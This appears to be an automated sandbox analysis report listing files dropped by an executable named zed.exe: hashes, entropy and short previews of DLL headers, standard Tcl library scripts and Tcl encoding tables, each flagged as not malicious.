                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.227566291152438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:/9gLpgE4Z27ARZWZnEmoAlI1OIH7SyT0xq:26RZeEmoAlI1OIHth
                                                                                                                                                                                                                                            MD5:D19CB5CA144AE1FD29B6395B0225CF40
                                                                                                                                                                                                                                            SHA1:5B9EC6E656261CE179DFCFD5C6A3CFE07C2DFEB4
                                                                                                                                                                                                                                            SHA-256:F95EC2562A3C70FB1A6E44D72F4223CE3C7A0F0038159D09DCE629F59591D5AA
                                                                                                                                                                                                                                            SHA-512:9AC3A8A4DBDB09BE3760E7CCB11269F82A47B24C03D10D289BCDDED9A43E57D3CD656F8D060D66B810382ECAC3A62F101F83EA626B58CD0B5A3CCA25B67B1519
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.V.......... @............................................../.....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160024
                                                                                                                                                                                                                                            Entropy (8bit):6.85368707809341
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:lsvkxujgo7e2uONOG+hi+C8znfF9mNooXnmbutI1Z1mb:lnu0o7JUrNYOo2Kz
                                                                                                                                                                                                                                            MD5:8CFBAFE65D6E38DDE8E2E8006B66BB3E
                                                                                                                                                                                                                                            SHA1:CB63ADDD102E47C777D55753C00C29C547E2243C
                                                                                                                                                                                                                                            SHA-256:6D548DB0AB73291F82CF0F4CA9EC0C81460185319C8965E829FAEACAE19444FF
                                                                                                                                                                                                                                            SHA-512:FA021615D5C080AADCD5B84FD221900054EB763A7AF8638F70CF6CD49BD92773074F1AC6884F3CE1D8A15D59439F554381377FAEE4842ED5BEB13FF3E1B510F4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35608
                                                                                                                                                                                                                                            Entropy (8bit):6.432025225087344
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:a1Rp7eiajKCWnAxQ0zduVI1Wt95YiSyvAAMxkE3:mRteiaoAxQ0zIVI1Wtj7SyGxr
                                                                                                                                                                                                                                            MD5:EB859FC7F54CBA118A321440AD088096
                                                                                                                                                                                                                                            SHA1:9D3C410240F4C5269E07FFBDE43D6F5E7CC30B44
                                                                                                                                                                                                                                            SHA-256:14BDD15D60B9D6141009AEEDC606007C42B46C779A523D21758E57CF126DC2A4
                                                                                                                                                                                                                                            SHA-512:694A9C1CC3DC78B47FAEDF66248FF078E5090CFAB22E95C123FB99B10192A5748748A5F0937FFD9FD8E1873AD48F290BE723FE194B7EB2A731ADD7F5FB776C4A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d.....f.........." ...(. ...>......@................................................J....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56088
                                                                                                                                                                                                                                            Entropy (8bit):6.331247108655531
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Minr44gaZPXxCJ/+yZdDDr5I1Xtw7Sy+xmS2:M3J/+yZdDDr5I1Xtwf
                                                                                                                                                                                                                                            MD5:DF92EA698A3D0729B70A4306BBE3029F
                                                                                                                                                                                                                                            SHA1:B82F3A43568148C64A46E2774AEC39BF1F2D3C1E
                                                                                                                                                                                                                                            SHA-256:46DEC978EC8CB2146854739BFEDDEA93335DCC92A25D719352B94F9517855032
                                                                                                                                                                                                                                            SHA-512:BDEBAFE1B40244A0CB6C97E75424F79CFE395774A9D03CDB02F82083110C1F4BDCAC2819BA1845AD1C56E2D2E6506DCC1833E4EB269BB0F620F0EB73B4D47817
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d.....f.........." ...(.N...`.......................................................M....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32536
                                                                                                                                                                                                                                            Entropy (8bit):6.552970921547832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:1lzRmezd6rGjMoW4BI1QUGL5YiSyv8+WAMxkEW7:LRm0MGooW4BI1QUG17SyIxC7
                                                                                                                                                                                                                                            MD5:7D91DD8E5F1DBC3058EA399F5F31C1E6
                                                                                                                                                                                                                                            SHA1:B983653B9F2DF66E721ECE95F086C2F933D303FC
                                                                                                                                                                                                                                            SHA-256:76BBA42B1392DC57A867AEF385B990FA302A4F1DCF453705AC119C9C98A36E8D
                                                                                                                                                                                                                                            SHA-512:B8E7369DA79255A4BB2ED91BA0C313B4578EE45C94E6BC74582FC14F8B2984ED8FCDA0434A5BD3B72EA704E6E8FD8CBF1901F325E774475E4F28961483D6C7CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.....8.......................................................x....`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83736
                                                                                                                                                                                                                                            Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                                            MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                                            SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                                            SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                                            SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178456
                                                                                                                                                                                                                                            Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                                            MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                                            SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                                            SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                                            SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21523
                                                                                                                                                                                                                                            Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                                            MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                                            SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                                            SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                                            SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):133439
                                                                                                                                                                                                                                            Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                                            MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                                            SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                                            SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                                            SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                                            MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                                            SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                                            SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                                            SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94389
                                                                                                                                                                                                                                            Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                                            MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                                            SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                                            SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                                            SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):98634
                                                                                                                                                                                                                                            Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                                            MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                                            SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                                            SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                                            SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                                            MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                                            SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                                            SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                                            SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                                            MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                                            SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                                            SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                                            SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.292994562910468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C4HVBUlJvRj7SOVbusZhAMiZyi77qdmV/rcwvGNNlkL+rSMH+tKv:rMlBVnrAMiwMmd2r/okLz0
                                                                                                                                                                                                                                            MD5:E9117326C06FEE02C478027CB625C7D8
                                                                                                                                                                                                                                            SHA1:2ED4092D573289925A5B71625CF43CC82B901DAF
                                                                                                                                                                                                                                            SHA-256:741859CF238C3A63BBB20EC6ED51E46451372BB221CFFF438297D261D0561C2E
                                                                                                                                                                                                                                            SHA-512:D0A39BC41ADC32F2F20B1A0EBAD33BF48DFA6ED5CC1D8F92700CDD431DB6C794C09D9F08BB5709B394ACF54116C3A1E060E2ABCC6B503E1501F8364D3EEBCD52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1252, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D017D008F..009020182019201C201D20222013201402DC21220161203A0153009D017E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.422723556981327
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CRHVBUlJvRj7SOVbusZhAMiZyi77qduWn4T5K9QQSqiWeIDDdn:CMlBVnrAMiwMmduWnSKyQSqiWeIVn
                                                                                                                                                                                                                                            MD5:441B86A0DE77F25C91DF1CD4685F651D
                                                                                                                                                                                                                                            SHA1:D1E429916BC9423F55EEC8F17941521E9FE9D32B
                                                                                                                                                                                                                                            SHA-256:5B8D47451F847C1BDE12CACA3739CA29860553C0B6399EE990D51B26F9A69722
                                                                                                                                                                                                                                            SHA-512:35DF342DDA4E8790C6D53762465DF8B93B49B7B7E211D7A5753078EF559C9C9383EFF7285A90FF5C0020FBB16AF380EE3C8643F4CEB1E41917E72021079D722F
                                                                                                                                                                                                                                            Malicious:false
